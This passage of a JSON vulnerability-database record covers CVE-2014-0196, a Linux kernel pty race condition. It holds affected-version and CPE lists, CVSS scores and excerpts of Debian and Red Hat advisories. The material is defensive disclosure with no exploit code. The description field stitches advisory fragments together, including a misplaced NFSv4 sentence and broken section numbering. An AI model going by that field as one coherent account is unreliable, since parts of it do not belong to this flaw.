        "vendor": "linux",
        "version": "3.0.61"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "3.0.64"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "3.0.60"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "3.0.62"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "3.0.63"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "3.0.53"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "3.0.54"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.3.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.3.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.3.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.1.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.18"
      },
      {
        "model": "kernel 3.0-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "linux s/390",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "linux mips",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "linux ia-64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "linux ia-32",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "67282"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201405-092"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-0196"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.31:rc4:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.31:rc6:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.31:rc9:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.31:rc5:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.31:rc7:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.31:rc8:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.31:rc3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.31:-:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "3.14.4",
                "versionStartIncluding": "3.13",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "3.12.20",
                "versionStartIncluding": "3.11",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "3.10.40",
                "versionStartIncluding": "3.5",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "3.4.91",
                "versionStartIncluding": "3.3",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "3.2.59",
                "versionStartExcluding": "2.6.31",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_eus:6.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_eus:6.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_eus:6.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux_enterprise_server:11:sp3:*:*:*:vmware:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux_enterprise_server:11:sp3:*:*:*:-:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux_enterprise_desktop:11:sp3:*:*:*:-:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux_enterprise_high_availability_extension:11:sp3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:oracle:linux:6:-:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:13.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:12.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:esm:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:10.04:*:*:*:-:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-iq_application_delivery_controller:4.5.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-iq_centralized_management:4.6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-iq_cloud_and_orchestration:1.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.5.1",
                "versionStartIncluding": "11.4.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.5.1",
                "versionStartIncluding": "11.3.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.5.1",
                "versionStartIncluding": "11.3.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-iq_security:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "4.5.0",
                "versionStartIncluding": "4.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-iq_device:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "4.5.0",
                "versionStartIncluding": "4.2.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-iq_cloud:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "4.5.0",
                "versionStartIncluding": "4.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:enterprise_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "3.1.1",
                "versionStartIncluding": "3.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.5.1",
                "versionStartIncluding": "11.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.5.1",
                "versionStartIncluding": "11.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_application_security_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.5.1",
                "versionStartIncluding": "11.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_edge_gateway:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.3.0",
                "versionStartIncluding": "11.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_global_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.5.1",
                "versionStartIncluding": "11.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_link_controller:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.5.1",
                "versionStartIncluding": "11.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_local_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.5.1",
                "versionStartIncluding": "11.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_protocol_security_module:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.4.1",
                "versionStartIncluding": "11.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_wan_optimization_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.3.0",
                "versionStartIncluding": "11.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_webaccelerator:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "11.3.0",
                "versionStartIncluding": "11.1.0",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2014-0196"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Ubuntu",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "126507"
      },
      {
        "db": "PACKETSTORM",
        "id": "126503"
      },
      {
        "db": "PACKETSTORM",
        "id": "126512"
      },
      {
        "db": "PACKETSTORM",
        "id": "126511"
      },
      {
        "db": "PACKETSTORM",
        "id": "127253"
      }
    ],
    "trust": 0.5
  },
  "cve": "CVE-2014-0196",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 6.9,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.4,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 6.9,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.4,
            "id": "VHN-67689",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:L/AC:M/AU:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2014-0196",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201405-092",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-67689",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-67689"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201405-092"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-0196"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The n_tty_write function in drivers/tty/n_tty.c in the Linux kernel through 3.14.3 does not properly manage tty driver access in the \"LECHO \u0026 !OPOST\" case, which allows local users to cause a denial of service (memory corruption and system crash) or gain privileges by triggering a race condition involving read and write operations with long strings. The Linux kernel is prone to a memory-corruption vulnerability. \nLocal attackers can exploit  this issue to execute arbitrary code in contexts of the application or corrupt the kernel memory. Failed exploit attempts can result in a denial-of-service condition. \nLinux kernel 3.0 through versions 3.14.3 are vulnerable. \nThis BID is being retired as a duplicate of BID 67199. The NFSv4 implementation is one of the distributed file system protocols. The vulnerability is caused by the program not properly managing the access rights of the tty driver. \n\nCVE-2014-2851\n\n    Incorrect reference counting in the ping_init_sock() function allows\n    denial of service or privilege escalation. \n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 3.2.57-3+deb7u1. This update also fixes a regression in the isci\ndriver and suspend problems with certain AMD CPUs (introduced in the\nupdated kernel from the Wheezy 7.5 point release). \n\nFor the unstable distribution (sid), these problems will be fixed soon. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Important: kernel-rt security update\nAdvisory ID:       RHSA-2014:0557-01\nProduct:           Red Hat Enterprise MRG for RHEL-6\nAdvisory URL:      https://rhn.redhat.com/errata/RHSA-2014-0557.html\nIssue date:        2014-05-27\nCVE Names:         CVE-2014-0100 CVE-2014-0196 CVE-2014-1737 \n                   CVE-2014-1738 CVE-2014-2672 CVE-2014-2678 \n                   CVE-2014-2706 CVE-2014-2851 CVE-2014-3122 \n=====================================================================\n\n1. Summary:\n\nUpdated kernel-rt packages that fix multiple security issues are now\navailable for Red Hat Enterprise MRG 2.5. \n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section. \n\n2. Relevant releases/architectures:\n\nMRG Realtime for RHEL 6 Server v.2 - noarch, x86_64\n\n3. \n\n* A race condition leading to a use-after-free flaw was found in the way\nthe Linux kernel\u0027s TCP/IP protocol suite implementation handled the\naddition of fragments to the LRU (Last-Recently Used) list under certain\nconditions. A remote attacker could use this flaw to crash the system or,\npotentially, escalate their privileges on the system by sending a large\namount of specially crafted fragmented packets to that system. \n(CVE-2014-0100, Important)\n\n* A race condition flaw, leading to heap-based buffer overflows, was found\nin the way the Linux kernel\u0027s N_TTY line discipline (LDISC) implementation\nhandled concurrent processing of echo output and TTY write operations\noriginating from user space when the underlying TTY driver was PTY. \nAn unprivileged, local user could use this flaw to crash the system or,\npotentially, escalate their privileges on the system. (CVE-2014-0196,\nImportant)\n\n* A flaw was found in the way the Linux kernel\u0027s floppy driver handled user\nspace provided data in certain error code paths while processing FDRAWCMD\nIOCTL commands. \n(CVE-2014-1737, Important)\n\n* It was found that the Linux kernel\u0027s floppy driver leaked internal kernel\nmemory addresses to user space during the processing of the FDRAWCMD IOCTL\ncommand. A local user with write access to /dev/fdX could use this flaw to\nobtain information about the kernel heap arrangement. (CVE-2014-1738, Low)\n\nNote: A local user with write access to /dev/fdX could use these two flaws\n(CVE-2014-1737 in combination with CVE-2014-1738) to escalate their\nprivileges on the system. \n\n* A use-after-free flaw was found in the way the ping_init_sock() function\nof the Linux kernel handled the group_info reference counter. A local,\nunprivileged user could use this flaw to crash the system or, potentially,\nescalate their privileges on the system. (CVE-2014-2851, Important)\n\n* It was found that a remote attacker could use a race condition flaw in\nthe ath_tx_aggr_sleep() function to crash the system by creating large\nnetwork traffic on the system\u0027s Atheros 9k wireless network adapter. \n(CVE-2014-2672, Moderate)\n\n* A NULL pointer dereference flaw was found in the rds_iw_laddr_check()\nfunction in the Linux kernel\u0027s implementation of Reliable Datagram Sockets\n(RDS). A local, unprivileged user could use this flaw to crash the system. \n(CVE-2014-2678, Moderate)\n\n* A race condition flaw was found in the way the Linux kernel\u0027s mac80211\nsubsystem implementation handled synchronization between TX and STA wake-up\ncode paths. A remote attacker could use this flaw to crash the system. \n(CVE-2014-2706, Moderate)\n\n* It was found that the try_to_unmap_cluster() function in the Linux\nkernel\u0027s Memory Managment subsystem did not properly handle page locking in\ncertain cases, which could potentially trigger the BUG_ON() macro in the\nmlock_vma_page() function. A local, unprivileged user could use this flaw\nto crash the system. (CVE-2014-3122, Moderate)\n\nRed Hat would like to thank Matthew Daley for reporting CVE-2014-1737 and\nCVE-2014-1738. The CVE-2014-0100 issue was discovered by Nikolay\nAleksandrov of Red Hat. \n\nUsers are advised to upgrade to these updated packages, which upgrade the\nkernel-rt kernel to version kernel-rt-3.10.33-rt32.34 and correct these\nissues. The system must be rebooted for this update to take effect. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to use the\nRed Hat Network to apply this update are available at\nhttps://access.redhat.com/site/articles/11258\n\nTo install kernel packages manually, use \"rpm -ivh [package]\". Do not use\n\"rpm -Uvh\" as that will remove the running kernel binaries from your\nsystem. You may use \"rpm -e\" to remove old kernels after determining that\nthe new kernel functions properly on your system. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1070618 - CVE-2014-0100 kernel: net: inet frag code race condition leading to user-after-free\n1083246 - CVE-2014-2672 kernel: ath9k: tid-\u003esched race in ath_tx_aggr_sleep()\n1083274 - CVE-2014-2678 kernel: net: rds: dereference of a NULL device in rds_iw_laddr_check()\n1083512 - CVE-2014-2706 Kernel: net: mac80211: crash dues to AP powersave TX vs. wakeup race\n1086730 - CVE-2014-2851 kernel: net: ping: refcount issue in ping_init_sock() function\n1093076 - CVE-2014-3122 Kernel: mm: try_to_unmap_cluster() should lock_page() before mlocking\n1094232 - CVE-2014-0196 kernel: pty layer race condition leading to memory corruption\n1094299 - CVE-2014-1737 CVE-2014-1738 kernel: block: floppy: privilege escalation via FDRAWCMD floppy ioctl command\n\n6. Package List:\n\nMRG Realtime for RHEL 6 Server v.2:\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/RHEMRG-RHEL6/SRPMS/kernel-rt-3.10.33-rt32.34.el6rt.src.rpm\n\nnoarch:\nkernel-rt-doc-3.10.33-rt32.34.el6rt.noarch.rpm\nkernel-rt-firmware-3.10.33-rt32.34.el6rt.noarch.rpm\n\nx86_64:\nkernel-rt-3.10.33-rt32.34.el6rt.x86_64.rpm\nkernel-rt-debug-3.10.33-rt32.34.el6rt.x86_64.rpm\nkernel-rt-debug-debuginfo-3.10.33-rt32.34.el6rt.x86_64.rpm\nkernel-rt-debug-devel-3.10.33-rt32.34.el6rt.x86_64.rpm\nkernel-rt-debuginfo-3.10.33-rt32.34.el6rt.x86_64.rpm\nkernel-rt-debuginfo-common-x86_64-3.10.33-rt32.34.el6rt.x86_64.rpm\nkernel-rt-devel-3.10.33-rt32.34.el6rt.x86_64.rpm\nkernel-rt-trace-3.10.33-rt32.34.el6rt.x86_64.rpm\nkernel-rt-trace-debuginfo-3.10.33-rt32.34.el6rt.x86_64.rpm\nkernel-rt-trace-devel-3.10.33-rt32.34.el6rt.x86_64.rpm\nkernel-rt-vanilla-3.10.33-rt32.34.el6rt.x86_64.rpm\nkernel-rt-vanilla-debuginfo-3.10.33-rt32.34.el6rt.x86_64.rpm\nkernel-rt-vanilla-devel-3.10.33-rt32.34.el6rt.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2014-0100.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0196.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-1737.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-1738.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2672.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2678.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2706.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-2851.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-3122.html\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e.  More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2014 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.4 (GNU/Linux)\n\niD8DBQFThL2GXlSAg2UNWIIRAnKNAKC8L7AEZsVfN3SDIRby/ZWJeNGsfACePcvG\nf8gO1I7yuxLQ1jWWp5abYcQ=\n=WQJC\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. 6.2) - x86_64\n\n3. \n\nThis update also fixes the following bug:\n\n* Prior to this update, a guest-provided value was used as the head length\nof the socket buffer allocated on the host. If the host was under heavy\nmemory load and the guest-provided value was too large, the allocation\ncould have failed, resulting in stalls and packet drops in the guest\u0027s Tx\npath. With this update, the guest-provided value has been limited to a\nreasonable size so that socket buffer allocations on the host succeed\nregardless of the memory load on the host, and guests can send packets\nwithout experiencing packet drops or stalls. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Server (v. 7) - noarch, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64\n\n3. 7):\n\nSource:\nkernel-3.10.0-123.1.2.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-123.1.2.el7.noarch.rpm\n\nx86_64:\nkernel-3.10.0-123.1.2.el7.x86_64.rpm\nkernel-debug-3.10.0-123.1.2.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-123.1.2.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-123.1.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-123.1.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-123.1.2.el7.x86_64.rpm\nkernel-devel-3.10.0-123.1.2.el7.x86_64.rpm\nkernel-headers-3.10.0-123.1.2.el7.x86_64.rpm\nkernel-tools-3.10.0-123.1.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-123.1.2.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-123.1.2.el7.x86_64.rpm\nperf-3.10.0-123.1.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-123.1.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-123.1.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nSource:\nkernel-3.10.0-123.1.2.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-123.1.2.el7.noarch.rpm\n\nx86_64:\nkernel-3.10.0-123.1.2.el7.x86_64.rpm\nkernel-debug-3.10.0-123.1.2.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-123.1.2.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-123.1.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-123.1.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-123.1.2.el7.x86_64.rpm\nkernel-devel-3.10.0-123.1.2.el7.x86_64.rpm\nkernel-headers-3.10.0-123.1.2.el7.x86_64.rpm\nkernel-tools-3.10.0-123.1.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-123.1.2.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-123.1.2.el7.x86_64.rpm\nperf-3.10.0-123.1.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-123.1.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-123.1.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 